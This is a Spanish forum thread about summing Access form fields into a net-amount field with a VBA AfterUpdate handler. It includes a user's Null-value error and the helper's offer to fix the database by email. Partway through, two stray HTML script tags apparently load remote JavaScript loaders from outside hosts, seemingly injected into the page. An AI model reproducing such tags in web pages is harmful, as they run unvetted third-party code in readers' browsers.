Suma de campos en Access

Si me pueden ayudar estaría eternamente agradecida.

Hice un formulario con varios campos y casillas de verificación, lo que quiero es que cuando active una casilla de esas, se sumen 2 o 3 o 4 campos en específicos y el resultado lo ponga en la casilla de Importe neto. Es un formulario de contabilidad pero no todos los campos se suman, ya se como sacar el iva al meter el subtotal en un campo, pero lo ahora tengo variantes de proveedor nacional, arrendamiento, honorarios y fletes, y no todos los campos deben arrojar el mismo resultado. Por ejemplo en Proveedor Nacional solo se deben sumar los campos de subtotal y el iva 16% y quiero que al activar la casilla de verificación de Proveedor Nacional, se sumen estos dos campos pero el resultado me lo coloque en el campo de Importe Neto. Ojala me haya explicado bien y puedan ayudarme, si me explican con manzanitas y naranjas estaría genial.

1 Respuesta

Respuesta

Te comento cómo lo haría con código (que entiendo que es lo más versátil, ya que no se si el campo "importe neto" es independiente o no, etc..)

En modo diseño del formulario, vas a cada una de las casillas de verificación, click con el botón derecho y escoges propiedades. En la "ficha" que te aparecerá en pantalla colocas el cursor en la linea (en blanco) que esta detrás de "Después de actualizar". En la parte final de la linea, a la derecha, te aparecerán "..." (3 puntitos), click en ellos, para que te abra el editor de VBA.

Verás que te ha creado dos líneas:

Private Sub nombrecasilla_AfterUpdate()
End Sub

En medio de esas dos líneas debes poner lo siguiente, adaptando todo a lo que tienes, (nombres de los campos y casillas de verificación)

if me.nombrecasilla = true then

me.importe_neto = me.campo1 + me.campo2 + me.campo3

end if

Mira a ver, con cualquier duda preguntame y no olvides visitar EL FORO

hola buenos días gracias por contestar, te comento que pegue lo que me acabas de escribir obviamente con los nombres de las casillas y me dice que debo depurar el error, al abrir visual basic, coloco el mouse sobre la linea amarilla que debo depurar: me.subtotal=Nulo.

coloque esto así como me lo escribiste arriba:

Private Sub Verificación110_AfterUpdate()
If Me.Verificación110 = True Then
Me.IMPORTE_NETO = Me.SUBTOTAL + Me.IVA_ACREDITABLE_16_
End If
End Sub

una pregunta mas... es que son varias casillas de verificación y por eso use grupo de opciones para que cuando se activara una casilla se desactivara la otra; y sí el campo de Importe Neto es independiente de los demás, porque luego en vez de sumar subtotal e iva del 16%, en importe neto al cambiar de casilla de verificación, se suma o se resta el subtotal con otros campos como el iva por acreditar, retención del 4% o Flete.

he hecho todo pero ya me estoy desesperando y debo entregar ese formato y ya no se como hacerle.

Te agradecería mucho si me ayudaras a salir de este atolladero. Muchas gracias por tu tiempo y tus conocimientos.

saludos!

El error puede ser que un control este vacío o no sea del formato determinado. Si te urge, haz una cosa. Enviame la BD, con dos datos ficticios de prueba es suficiente a

[email protected]

Si lo soluciono te lo devuelvo solucionado y luego comento aquí la solución. Un saludo.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

Hola kepasada. sigo esperando tu respuesta, gracias por todo!

Pues lo miro ahora pero te remití la BD el mismo día o al día siguiente. Lo compruebo ahora mismo y te la vuelvo a enviar.

Confirmado. Te envíe un correo el lunes a las 7 de la mañana. De todas formas te lo he vuelto a enviar. Ya comentas.